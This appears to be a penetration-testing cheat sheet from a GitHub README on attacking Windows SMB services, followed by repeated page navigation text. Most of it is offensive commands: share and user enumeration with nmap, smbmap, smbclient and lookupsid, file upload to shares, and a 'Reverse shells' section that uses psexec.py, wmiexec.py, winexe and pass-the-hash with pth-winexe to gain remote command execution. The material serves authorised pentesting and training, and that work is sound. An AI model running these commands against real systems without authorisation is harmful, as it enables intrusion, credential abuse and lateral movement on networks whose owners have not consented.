Server Message Block (SMB) enumeration and exploitation

Initial enumeration
SID enumeration
Connecting to and enumerating an SMB share
Uploading files
Reverse shells

Initial enumeration

Nmap smb-enum scripts (not comprehensive, consider using other options):

nmap -vv -p 139,445 -sT --script=+smb-enum* <ip>

Nmap All SMB scripts (usually takes too long):

nmap -vv -p 139,445 -sT --script=+smb* <ip>

enum4linux all enumeration:

enum4linux -a <ip>

List shares:

smbclient -L <ip>
smbclient -L <ip> -U <username>

List shares with permissions:

smbmap -H <ip>
smbmap -H <ip> -u 'anonymous'
smbmap -H <ip> -u 'anonymous' -p 'anonymous' 
smbmap -H <ip> -u <username> -p '<password>'

SID enumeration

Enumerate users using MSRPC (requires access to the IPC$ share):

lookupsid.py <ip>
lookupsid.py <user>:<password>@<ip>

Connecting to and enumerating an SMB share

Connect to a share:

smbclient //<ip>/<share_name>
smbclient //<ip>/<share_name> -U='anonymous%'
smbclient //<ip>/<share_name> -U='<username>%<password>'

Enumerate files and folders:

ls
cd <path>
get <filename>

Uploading files

put <filename>

Reverse shells

psexec.py '<username>:<password>@<ip>'
wmiexec.py '<username>:<password>@<ip>'
winexe -U '<username>%<password>' //<ip> cmd.exe
pth-winexe -U '<username>%<lm_hash>:<nt_hash>' //<ip> cmd.exe

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

Server Message Block (SMB) enumeration and exploitation

Initial enumeration

SID enumeration

Connecting to and enumerating an SMB share

Uploading files

Reverse shells

Files

README.md

Latest commit

History

README.md

File metadata and controls

Server Message Block (SMB) enumeration and exploitation

Initial enumeration

SID enumeration

Connecting to and enumerating an SMB share

Uploading files

Reverse shells